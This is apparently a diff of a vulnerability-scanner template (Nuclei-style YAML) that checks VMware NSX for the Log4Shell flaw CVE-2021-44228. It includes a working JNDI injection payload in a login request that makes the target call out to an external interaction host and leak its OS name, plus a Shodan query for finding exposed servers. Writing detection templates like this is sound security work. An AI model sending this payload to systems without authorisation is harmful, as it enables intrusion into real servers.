vulnerabilities/vmware/vmware-nsx-log4j.yaml (before)
id: vmware-nsx-log4j

info:
  name: VMware NSX - Remote Code Execution (Apache Log4j)
  author: DhiyaneshDK
  severity: critical
  description: VMware NSX is susceptible to remote code execution via the Apache Log4j framework. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
  reference:
    - https://kb.vmware.com/s/article/87086
    - https://logging.apache.org/log4j/2.x/security.html
    - https://nvd.nist.gov/vuln/detail/CVE-2021-44228
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cve-id: CVE-2021-44228
    cwe-id: CWE-917
  metadata:
    shodan-query: html:"vmw_nsx_logo-black-triangle-500w.png"
    verified: "true"
  tags: cve,cve2021,rce,jndi,log4j,graylog,kev,oast

requests:
  - raw:
      - |
        POST /login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Origin: {{BaseURL}}
        Referer: {{BaseURL}}/login.jsp

        username=${jndi:ldap://${sys:os.name}.{{interactsh-url}}}&password=admin&submit=

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol  # Confirms the DNS Interaction
        words:
          - "dns"

      - type: regex
        part: interactsh_request
        regex:
          - '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+'  # Match for extracted ${sys:os.name} variable

    extractors:
      - type: kval
        kval:
          - interactsh_ip # Print remote interaction IP in output

      - type: regex
        part: interactsh_request
        group: 1
        regex:
          - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'  # Print extracted ${sys:os.name} in output

# Enhanced by md on 2022/10/06

vulnerabilities/vmware/vmware-nsx-log4j.yaml (after)
id: vmware-nsx-log4j

info:
  name: VMware NSX - Remote Code Execution (Apache Log4j)
  author: DhiyaneshDK
  severity: critical
  description: VMware NSX is susceptible to remote code execution via the Apache Log4j framework. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
  reference:
    - https://kb.vmware.com/s/article/87086
    - https://logging.apache.org/log4j/2.x/security.html
    - https://nvd.nist.gov/vuln/detail/CVE-2021-44228
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cve-id: CVE-2021-44228
    cwe-id: CWE-77
  metadata:
    shodan-query: html:"vmw_nsx_logo-black-triangle-500w.png"
    verified: "true"
  tags: cve,cve2021,rce,jndi,log4j,graylog,kev,oast

requests:
  - raw:
      - |
        @timeout: 20s
        POST /login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Origin: {{BaseURL}}
        Referer: {{BaseURL}}/login.jsp

        username=${jndi:ldap://${sys:os.name}.{{interactsh-url}}}&password=admin&submit=

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol  # Confirms the DNS Interaction
        words:
          - "dns"

      - type: regex
        part: interactsh_request
        regex:
          - '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+'  # Match for extracted ${sys:os.name} variable

      - type: word
        part: location
        words:
          - '/login.jsp?login_error=1'

    extractors:
      - type: kval
        kval:
          - interactsh_ip # Print remote interaction IP in output

      - type: regex
        part: interactsh_request
        group: 1
        regex:
          - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'  # Print extracted ${sys:os.name} in output

vulnerabilities/vmware/vmware-nsx-log4j.yaml (diff)
@@ -13,7 +13,7 @@ info:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
     cvss-score: 10
     cve-id: CVE-2021-44228
-    cwe-id: CWE-917
+    cwe-id: CWE-77
   metadata:
     shodan-query: html:"vmw_nsx_logo-black-triangle-500w.png"
     verified: "true"
@@ -22,6 +22,7 @@ info:
 requests:
   - raw:
       - |
+        @timeout: 20s
         POST /login HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded
@@ -42,6 +43,11 @@ requests:
         regex:
           - '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+'  # Match for extracted ${sys:os.name} variable
 
+      - type: word
+        part: location
+        words:
+          - '/login.jsp?login_error=1'
+
     extractors:
       - type: kval
         kval:
@@ -52,5 +58,3 @@ requests:
         group: 1
         regex:
           - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'  # Print extracted ${sys:os.name} in output
-
-# Enhanced by md on 2022/10/06
